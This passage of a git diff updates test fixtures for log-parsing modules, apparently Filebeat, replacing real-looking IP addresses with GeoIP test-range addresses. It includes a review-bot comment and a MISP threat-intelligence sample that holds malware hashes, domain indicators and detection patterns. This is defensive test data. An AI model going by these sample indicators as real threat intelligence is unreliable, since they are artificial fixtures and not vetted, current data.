 "juniper.srx.tag": "WEBFILTER_URL_BLOCKED",
 "log.level": "warning",
- "log.offset": 3552,
+ "log.offset": 3588,
 "observer.egress.zone": "untrust",
 "observer.ingress.zone": "trust",
 "observer.name": "SRX650-1",
@@ -654,7 +624,7 @@
 },
 {
 "@timestamp": "2020-07-14T12:17:04.733-02:00",
- "client.ip": "23.209.86.45",
+ "client.ip": "67.43.156.12",
 "client.port": 80,
 "destination.ip": "10.1.1.100",
 "destination.port": 58954,
@@ -664,7 +634,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"23.209.86.45\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"",
+ "event.original": "source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.12\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"",
 "event.outcome": "success",
 "event.severity": 12,
 "event.timezone": "-02:00",
@@ -682,7 +652,7 @@
 "juniper.srx.reason": "exceeding maximum content size",
 "juniper.srx.tag": "AV_FILE_NOT_SCANNED_DROPPED_MT",
 "log.level": "warning",
- "log.offset": 4078,
+ "log.offset": 4118,
 "observer.egress.zone": "untrust",
 "observer.ingress.zone": "trust",
 "observer.name": "SRX650-1",
@@ -691,19 +661,18 @@
 "observer.vendor": "Juniper",
 "related.ip": [
 "10.1.1.100",
- "23.209.86.45"
+ "67.43.156.12"
 ],
 "server.ip": "10.1.1.100",
 "server.port": 58954,
 "service.type": "juniper",
- "source.as.number": 16625,
- "source.as.organization.name": "Akamai Technologies, Inc.",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "NL",
- "source.geo.country_name": "Netherlands",
- "source.geo.location.lat": 52.3824,
- "source.geo.location.lon": 4.8995,
- "source.ip": "23.209.86.45",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.port": 80,
 "tags": [
 "forwarded",
diff --git a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
index 1d6ba2edb696..d476534d7e94 100644
--- a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
+++ b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log
@@ -1,4 +1,4 @@ -{"id":"1","event_id":"1","object_id":"0","object_relation":null,"category":"Network activity","type":"ip-dst","to_ids":false,"uuid":"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"98.235.162.24","Event":{"org_id":"1","distribution":"3","id":"1","info":"Tor exit nodes feed","orgc_id":"2","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} +{"id":"1","event_id":"1","object_id":"0","object_relation":null,"category":"Network activity","type":"ip-dst","to_ids":false,"uuid":"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"67.43.156.13","Event":{"org_id":"1","distribution":"3","id":"1","info":"Tor exit nodes feed","orgc_id":"2","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} {"id":"2","event_id":"2","object_id":"0","object_relation":null,"category":"Payload delivery","type":"md5","to_ids":true,"uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b81","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"89357a1b2e32f2b9bddff94b8136810b","Event":{"org_id":"1","distribution":"3","id":"1","info":"OSINT - OSX/Linker: New Mac malware attempts zero-day Gatekeeper bypass","orgc_id":"2","uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b81"}} {"id":"3","event_id":"3","object_id":"0","object_relation":null,"category":"Payload delivery","type":"filename","to_ids":true,"uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b82","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de","Event":{"org_id":"1","distribution":"3","id":"1","info":"OSINT - OSX/Linker: New Mac malware attempts zero-day Gatekeeper 
bypass","orgc_id":"2","uuid":"5d159be2-d4b4-4d97-9e14-406a02de0b82"}} {"id":"4","event_id":"4","object_id":"0","object_relation":null,"category":"Bad Domain","type":"domain","to_ids":true,"uuid":"563b3ea6-b26c-401f-a68b-4d84950d210b","timestamp":"1490878466","distribution":"5","sharing_group_id":"0","comment":"","deleted":false,"disable_correlation":false,"value":"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de","Event":{"org_id":"4","distribution":"3","id":"4","info":"OSINT Expansion on Systematic cyber attacks against Israeli and Palestinian targets going on for a year by Norman","orgc_id":"2","uuid":"563b3ea6-b26c-401f-a68b-4d84950d210b"}} diff --git a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json index ba55329aaf8a..e24353974642 100644 --- a/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json +++ b/x-pack/filebeat/module/misp/threat/test/misp-test.json.log-expected.json 
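Review bot: The replacement indicator 67.43.156.13 has no city or region entry in the test GeoIP database (the regenerated expected output for this record carries only continent, country and location, whereas 98.235.162.24 also produced destination.geo.city_name and destination.geo.region_*), so this fixture no longer exercises the city- and region-level destination.geo fields for ip-dst indicators. If that coverage matters, an address from the range the o365 fixtures now use (81.2.69.143 resolves to London/England in the same database) would keep it. The new addresses look like the MaxMind test-database ranges rather than live hosts, which is the right property for a published sample feed; a short note in the module's test README stating that sample IPs must come from those ranges would stop future fixtures from reintroducing routable addresses.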
@@ -1,28 +1,25 @@ [ { "@timestamp": "2017-03-30T12:54:26.000Z", - "destination.geo.city_name": "State College", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 40.7957, - "destination.geo.location.lon": -77.8618, - "destination.geo.region_iso_code": "US-PA", - "destination.geo.region_name": "Pennsylvania", - "destination.ip": "98.235.162.24", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.13", "event.category": "threat-intel", "event.dataset": "misp.threat", "event.id": "5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26", "event.kind": "event", "event.module": "misp", - "event.original": "{\"id\":\"1\",\"event_id\":\"1\",\"object_id\":\"0\",\"object_relation\":null,\"category\":\"Network activity\",\"type\":\"ip-dst\",\"to_ids\":false,\"uuid\":\"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26\",\"timestamp\":\"1490878466\",\"distribution\":\"5\",\"sharing_group_id\":\"0\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"value\":\"98.235.162.24\",\"Event\":{\"org_id\":\"1\",\"distribution\":\"3\",\"id\":\"1\",\"info\":\"Tor exit nodes feed\",\"orgc_id\":\"2\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}", + "event.original": "{\"id\":\"1\",\"event_id\":\"1\",\"object_id\":\"0\",\"object_relation\":null,\"category\":\"Network activity\",\"type\":\"ip-dst\",\"to_ids\":false,\"uuid\":\"5d2cb906-eff4-40f0-9f1d-10eb7d6a0c26\",\"timestamp\":\"1490878466\",\"distribution\":\"5\",\"sharing_group_id\":\"0\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"value\":\"67.43.156.13\",\"Event\":{\"org_id\":\"1\",\"distribution\":\"3\",\"id\":\"1\",\"info\":\"Tor exit nodes 
feed\",\"orgc_id\":\"2\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}", "event.type": "indicator", "fileset.name": "threat", "input.type": "log", "log.offset": 0, - "message": "98.235.162.24", - "misp.threat_indicator.attack_pattern": "[destination:ip = '98.235.162.24']", - "misp.threat_indicator.attack_pattern_kql": "destination.ip: \"98.235.162.24\"", + "message": "67.43.156.13", + "misp.threat_indicator.attack_pattern": "[destination:ip = '67.43.156.13']", + "misp.threat_indicator.attack_pattern_kql": "destination.ip: \"67.43.156.13\"", "misp.threat_indicator.description": "Tor exit nodes feed", "misp.threat_indicator.feed": "misp", "misp.threat_indicator.id": "58dcfe62-ed84-4e5e-b293-4991950d210f", @@ -45,7 +42,7 @@ "file.hash.md5": "89357a1b2e32f2b9bddff94b8136810b", "fileset.name": "threat", "input.type": "log", - "log.offset": 460, + "log.offset": 459, "message": "89357a1b2e32f2b9bddff94b8136810b", "misp.threat_indicator.attack_pattern": "[file:hash:md5 = '89357a1b2e32f2b9bddff94b8136810b']", "misp.threat_indicator.attack_pattern_kql": "file.hash.md5: \"89357a1b2e32f2b9bddff94b8136810b\"", @@ -71,7 +68,7 @@ "file.path": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de", "fileset.name": "threat", "input.type": "log", - "log.offset": 987, + "log.offset": 986, "message": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de", "misp.threat_indicator.attack_pattern": "[file:path = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de']", "misp.threat_indicator.attack_pattern_kql": "file.path: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\"", 
@@ -96,7 +93,7 @@
 "event.type": "indicator",
 "fileset.name": "threat",
 "input.type": "log",
- "log.offset": 1551,
+ "log.offset": 1550,
 "message": "f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de",
 "misp.threat_indicator.attack_pattern": "[dns:question:name = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR url:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR source:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de' OR destination:domain = 'f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de']",
 "misp.threat_indicator.attack_pattern_kql": "dns.question.name: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR url.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR source.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\" OR destination.domain: \"f6bf5b8bb2400aad4ac844f2b94a4e556907f35b44c5ff462fb4e70c0208c9de\"",
@@ -121,7 +118,7 @@
 "event.type": "indicator",
 "fileset.name": "threat",
 "input.type": "log",
- "log.offset": 2149,
+ "log.offset": 2148,
 "message": "endgame.hungmnguyen.us",
 "misp.threat_indicator.attack_pattern": "[url:full = 'endgame.hungmnguyen.us']",
 "misp.threat_indicator.attack_pattern_kql": "url.full: \"endgame.hungmnguyen.us\"",
diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
index ff290c1041b5..d8da6b97d2ff 100644
--- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
+++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log
@@ -1,4 +1,4 @@ -{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CustomUniqueId": true, "UserType": 0, "Version": 1, "EventSource": "SharePoint", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CreationTime": "2020-02-07T16:43:53", "RecordType": 4} -{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4} -{"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", 
"Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"} -{"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"} +{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CustomUniqueId": true, 
"UserType": 0, "Version": 1, "EventSource": "SharePoint", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "81.2.69.143", "Operation": "PageViewed", "CreationTime": "2020-02-07T16:43:53", "RecordType": 4} +{"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "81.2.69.143", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4} +{"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "81.2.69.143", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", 
"Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"} +{"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "81.2.69.143", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"} diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json index 04d66f454bc8..ff9712cdcc70 100644 --- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json @@ -1,8 +1,8 @@ [ { "@timestamp": "2020-02-07T16:43:53.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "PageViewed", "event.category": "web", "event.code": "SharePoint", @@ -19,7 +19,7 @@ "input.type": "log", "log.offset": 0, "network.type": "ipv4", - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "o365.audit.CreationTime": "2020-02-07T16:43:53", "o365.audit.CustomUniqueId": true, 
@@ -40,20 +40,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -71,8 +69,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:53.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "PageViewed",
 "event.category": "web",
 "event.code": "SharePoint",
@@ -87,9 +85,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 870,
+ "log.offset": 868,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
 "o365.audit.CreationTime": "2020-02-07T16:43:53",
 "o365.audit.CustomUniqueId": true,
@@ -110,20 +108,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -141,8 +137,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:53.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "PageViewed",
 "event.category": "web",
 "event.code": "SharePoint",
@@ -157,9 +153,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 1740,
+ "log.offset": 1736,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
 "o365.audit.CreationTime": "2020-02-07T16:43:53",
 "o365.audit.CustomUniqueId": true,
@@ -180,20 +176,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -211,8 +205,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:53.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "PageViewed",
 "event.category": "web",
 "event.code": "SharePoint",
@@ -227,9 +221,9 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 2610,
+ "log.offset": 2604,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25",
 "o365.audit.CreationTime": "2020-02-07T16:43:53",
 "o365.audit.CustomUniqueId": true,
@@ -250,20 +244,18 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
index bc5573e588db..cc5dd5aeb1a4 100644
--- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
+++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log
@@ -1,11 +1,11 @@
-{"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": 